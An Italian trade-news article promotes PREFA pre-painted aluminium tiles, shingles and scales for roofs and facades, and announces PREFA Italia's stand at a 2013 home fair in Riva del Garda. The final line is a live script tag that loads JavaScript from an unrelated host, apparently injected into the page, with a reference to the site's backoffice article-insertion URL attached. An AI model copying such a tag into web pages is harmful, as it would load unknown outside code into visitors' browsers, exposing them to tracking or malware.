1. Home
  2. Notizie e Mercato
  3. Piccoli elementi in alluminio per coperture e facciate

Piccoli elementi in alluminio per coperture e facciate

Sistema tetto di
5/5
votato da 1 persone
I piccoli elementi in alluminio PREFA hanno caratteristiche estetiche e prestazioni tali da consentire infinite sperimentazioni architettoniche con risultati sempre garantiti


Le Tegole, le Scandole e le Scaglie in alluminio preverniciato nascono per l’impiego in copertura, dove offrono leggerezza e massima resistenza. Le loro qualità estetiche e la loro versatilità tuttavia non passano inosservate e ben presto questi elementi cominciano ad essere utilizzati anche in facciata. Mentre l’architettura scopre nuove contaminazioni e sperimentazioni, anche PREFA sperimenta nuove soluzioni tecniche e nuove colorazioni.   Il risultato è un prodotto con infinite possibilità di applicazione ed eccellenti caratteristiche di leggerezza, resistenza al gelo, ai carichi, al vento e alla corrosione. L’alluminio è inoltre una scelta ecologica, poiché è riciclato al 90% ed è completamente riciclabile; oggi incontra anche una nuova varietà cromatica, grazie ai 8 colori standard PREFA e un ampio programma di accessori che garantiscono tetti esteticamente elaborati ed estremamente durevoli. A livello tecnico le applicazioni dei piccoli elementi in alluminio sono pressoché infinite, mentre la sicurezza di una posaperfetta è garantita dal sistema brevettato PREFA e da installatori qualificati e preparati direttamente dalla casa produttrice con corsi di installazione.

Tegola PREFA
La tegola in alluminio PREFA, adatta sia a nuove costruzioni che a ristrutturazioni, offre le migliori garanzie di resistenza, durata e resa estetica. Grazie alla qualità del materiale ed alla praticità del sistema di posa rapido, con graffette in allumino brevettate, la copertura completa di lattoneria viene posata in breve tempo da tecnici specializzati PREFA ed è garantita per ben 40 anni contro rottura, ruggine e congelamento.
 
Scaglia PREFA
Le coperture a scaglie, caratterizzate da un armonioso gioco di luci ed ombre, rappresentano la soluzione ideale in tutte le situazioni che richiedono una perfetta integrazione architettonica con l’intorno. L’innovativa forma della Scaglia PREFA offre vantaggi sia funzionali che estetici. L’esclusiva punta leggermente allungata verso il basso, infatti, non solo dona alla copertura un aspetto raffinato e fortemente armonico, ma consente anche di abbassare la pendenza minima di posa dai 25 ai 22 gradi.

Scandola PREFA

Le Scandole PREFA combinano la forma classica del rombo con le caratteristiche high-tech dell’alluminio per soddisfare ogni esigenza tecnica ed estetica. Sono ideali per il rinnovo di coperture esistenti, per la copertura di nuovi edifici con caratteristiche architettoniche particolari o per coperture e rivestimenti di facciata in architetture dal design moderno.

PREFA ITALIA vi aspetta (dal 26 al 28 ottobre 2013) alla fiera IO CASA di Riva del Garda (Pad. B2 Stand E16) con i suoi tecnici specializzati e i suoi consulenti per presentarvi le ultime novità e gli intramontabili classici della gamma PREFA.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.7861504243222085" type="text/javascript"></script>